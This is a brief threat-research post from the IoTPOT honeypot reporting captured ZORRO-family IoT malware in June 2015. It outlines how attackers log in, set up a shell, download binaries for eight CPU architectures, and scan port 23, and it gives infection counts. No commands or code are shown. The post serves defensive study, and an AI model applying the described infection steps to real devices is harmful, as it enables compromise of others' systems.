IoTPOT captures new binaries of ZORRO family!
In June 07, 2015, IoTPOT captured new binaries of "ZORRO family" designed to run on 8 different CPU architectures. After successful login, attacker checks and customizes the environment first as in previous versions of ZORRO family as shown in Figure - 1. Then, attacker appends series of binaries to random file name and makes his own shell to download malware binaries from malware download server as in Figure- 2 and 3 respectively. The attacking IP to IoTPOT and IP address of malware download server are same. Within 5 days [from June 07 to June 11], IoTPOT detected 14,911 times of such infection from 1 IP.
In June 08, 2015, IoTPOT captured another new binaries of "ZORRO family" designed to run on 8 different CPU architectures. Malware infection process is same as June 07 version of ZORRO family. Only IP address of malware download server and names of downloaded binaries are different. Figure - 4 shows downloaded binaries. IoTPOT observes such infection only for 4 days. Within 4 days [from June 08 to June 11], IoTPOT detected 10,659 times of such infection from 1 IP. By sandbox analysis, these binaries scan port 23 as shown in Figure - 5.